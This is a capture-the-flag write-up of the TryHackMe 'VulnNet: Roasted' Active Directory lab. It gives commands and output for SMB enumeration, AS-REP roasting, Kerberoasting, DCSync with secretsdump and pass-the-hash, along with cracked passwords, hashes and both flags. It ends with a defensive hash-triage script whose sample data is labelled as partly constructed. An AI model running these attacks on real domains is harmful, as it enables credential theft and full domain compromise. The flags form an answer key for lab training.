TryHackMe-VulnNet: Roasted

Posted: 2023-02-19 12:19:42

Information gathering

An nmap scan shows DNS, Kerberos and other services open, and the script output reveals the domain name vulnnet-rst.local. DNS plus Kerberos plus LDAP on one host is the usual signature of an Active Directory domain controller, which is what we will treat it as from here on.

nmap -sV -sC -Pn 10.10.107.74

Enumerating SMB shares

For a Windows host we usually start by enumerating SMB shares (port 445), since credentials are often left lying around in shared files. Common tools are crackmapexec, smbclient and smbmap; here smbmap with an anonymous (null-session) login shows three shares that are readable without any credentials.

smbmap -H 10.10.107.74 -u anonymous

Because IPC$ is readable anonymously, we can use impacket's lookupsid script, which cycles through RIDs over the LSARPC named pipe (RID cycling) to enumerate valid domain users and groups (press Enter at the password prompt):

python lookupsid.py anonymous@10.10.107.74 | tee usernames
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.107.74
[*] StringBinding ncacn_np:10.10.107.74[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)

Then we extract the user accounts from this output. Note that the original one-liner read from and wrote to the same file (usernames) in one pipeline, which truncates the file before cat has finished reading it; writing to a separate file avoids that and also gives GetNPUsers the path it expects below:

grep SidTypeUser usernames | awk -F '\\' '{ print $2 }' | awk '{ print $1 }' | tee /root/users.txt
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

AS-REP Roasting

AS-REP Roasting targets accounts that have "Do not require Kerberos preauthentication" set (the DONT_REQ_PREAUTH flag in userAccountControl). Normally the KDC only issues an AS-REP after the client proves knowledge of the password with an encrypted timestamp; without preauthentication, anyone who knows the username can request a TGT for it, and part of the AS-REP comes back encrypted with a key derived from the user's password, so it can be cracked offline. Running impacket's GetNPUsers against our user list shows that only t-skid has preauthentication disabled:

python GetNPUsers.py -no-pass -usersfile /root/users.txt -dc-ip 10.10.107.74 vulnnet-rst.local/

$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:31be8bf9464ca217547bf2206268d10e$57402956b1951d7944c587f4dc16c68251d800bac7b8a8e0718fbf3079f0efad1db3c2732ef94cc1fbeac2b59e47e70e28f65e1cd5bbb7665f1d06250ed7d00ab1f721d01cf48827f8f9a6f5e09c59623ab44debc007023299ce86056e4f8e5ea81eaf7af40e0cdd34bbf837af7a4e7814199fd94f582da53c21391db47d6a8398cb573fe2771978001da2173cd325ea8df82fb1899ad799d283edcb3a31bff4f7f605fdf8388865217e270132eeceabd90b194886621155ed118b4920c6a4ff0aa70b0c59d81fd99753aa2ab1cd74753fef4be6d3ea6925dbb1157f7bee5150bc9280cf174db2d0cfcc353710f8133873bdcb631458

Cracking it with hashcat (mode 18200, Kerberos 5 AS-REP etype 23) gives the password: tj072889*

hashcat -m 18200 /root/hash.txt /usr/share/wordlists/rockyou.txt

Kerberoasting with t-skid's credentials

Now that we have a valid domain credential we can Kerberoast: any domain user may request a service ticket (TGS) for an account that has a Service Principal Name (SPN) registered, and that ticket is encrypted with the service account's own key (its NT hash for RC4/etype 23), so it can be cracked offline to recover the service account's password. impacket's GetUserSPNs lists the SPN accounts; with -request it also requests their tickets and -outputfile writes them in hashcat format:

python GetUserSPNs.py -dc-ip 10.10.107.74 'vulnnet-rst.local/t-skid:tj072889*' -request -outputfile kerberoasting_hashes.txt

Cracking with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23) gives the password of the SPN account enterprise-core-vn: ry=ibfkfv,s6h,

hashcat -m 13100 kerberoasting_hashes.txt /usr/share/wordlists/rockyou.txt

Then log in as enterprise-core-vn through evil-winrm to get flag1: THM{726b7c0baaac1455d05c827b5561f4ed} (it froze, and while I was out the machine's time ran out and I couldn't extend it; it would have been better to just start today's AttackBox)

evil-winrm -i 10.10.29.162 -u enterprise-core-vn -p 'ry=ibfkfv,s6h,'

Privilege escalation

With enterprise-core-vn's credentials we can now read the NETLOGON and SYSVOL SMB shares (the target IP is 10.10.29.162 from here on because the machine was redeployed):

crackmapexec smb 10.10.29.162 --shares -u enterprise-core-vn -p 'ry=ibfkfv,s6h,'
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False)
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  [+] vulnnet-rst.local\enterprise-core-vn:ry=ibfkfv,s6h, 
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  [+] Enumerated shares
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  Share           Permissions     Remark
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  -----           -----------     ------
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  ADMIN$                          Remote Admin
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  C$                              Default share
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  IPC$            READ            Remote IPC
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  NETLOGON        READ            Logon server share 
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  SYSVOL          READ            Logon server share 
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  VulnNet-Business-Anonymous READ    VulnNet Business Sharing
SMB         10.10.29.162   445    WIN-2BO8M1OE1M1  VulnNet-Enterprise-Anonymous READ  VulnNet Enterprise Sharing 

Enumerating the shares again with enterprise-core-vn's credentials turns up a .vbs logon script in NETLOGON; reading it gives another set of credentials: a-whitehat / bNdKVkjv3RR9ht. Logon scripts in NETLOGON and SYSVOL are readable by every domain user, so a password hardcoded there is exposed to the whole domain.

smbclient -U enterprise-core-vn //10.10.29.162/NETLOGON

When logging in here I was connected for a short while and then it suddenly disconnected and I couldn't reconnect; so I shut it down, restarted and switched to Kali to keep trying

evil-winrm -i 10.10.29.162 -u 'a-whitehat' -p 'bNdKVkjv3RR9ht'

Since a-whitehat is a Domain Admin, we can run a DCSync attack (abusing the directory replication rights that Domain Admins hold) to pull the domain Administrator's NT hash, then log in with that hash via evil-winrm (pass-the-hash).

impacket's secretsdump script does this: it first dumps the local SAM through the remote registry, then uses DRSUAPI replication (DCSync) to extract the domain hashes from NTDS.DIT. The output below is cut off after the SAM section; the domain accounts follow it under "Dumping Domain Credentials".

python secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.29.162
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)

Then log in as Administrator with the NT hash (pass-the-hash) to get flag2: THM{16f45e3934293a57645f8d7bf71d8d4c}

evil-winrm -i 10.10.29.162 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
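secretsdump prints one user:rid:lmhash:nthash::: line per account, and before using anything from it a quick triage is worthwhile. The Python below is an added example, not part of this writeup or of impacket, that parses that format and flags empty passwords, LM hashes that are still being stored, and NT hashes shared between accounts. The sample output is constructed: the SAM lines are the ones shown above, but the "Dumping Domain Credentials" section that secretsdump prints after them is not on this page, so the domain lines (an Administrator entry reusing the hash that logged in above, a hypothetical legacy-svc account, and a password-history entry) are made up for the demo.

```python
import re
from collections import defaultdict
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string: no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string: account has no password

# user:rid:lmhash:nthash::: as printed by secretsdump for both the SAM and the NTDS sections
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::", re.I)

# Constructed sample: SAM lines from this page plus made-up NTDS lines in the same layout.
SAMPLE_OUTPUT = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
vulnnet-rst.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
vulnnet-rst.local\\legacy-svc:1200:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
vulnnet-rst.local\\legacy-svc_history0:1200:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_secretsdump(text: str) -> List[Dict]:
    """Pull (user, rid, lm, nt) rows out of secretsdump output, skipping status lines and history entries."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        if "_history" in m["user"].lower():   # NTDS history rows (secretsdump -history) are old passwords
            continue
        rows.append({"user": m["user"], "rid": int(m["rid"]), "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return rows


def triage(rows: List[Dict]) -> Dict:
    """Findings worth acting on: empty passwords, LM hashes still stored, NT hashes shared between accounts."""
    findings = {"empty_password": [], "lm_stored": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings["empty_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:                   # a real LM hash means LM storage was never disabled
            findings["lm_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    findings["shared_nt"] = {nt: users for nt, users in by_nt.items() if len(users) > 1 and nt != EMPTY_NT}
    return findings


if __name__ == "__main__":
    for key, value in triage(parse_secretsdump(SAMPLE_OUTPUT)).items():
        print(f"{key}: {value}")
```

On a domain controller the SAM section holds the DSRM Administrator; when the domain Administrator entry carries the same NT hash the two share a password, which is what let the SAM hash above log in to the domain account. Empty-hash and LM-hash findings are what a blue team should fix before anything else, since both are crackable instantly.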

And that's it, done!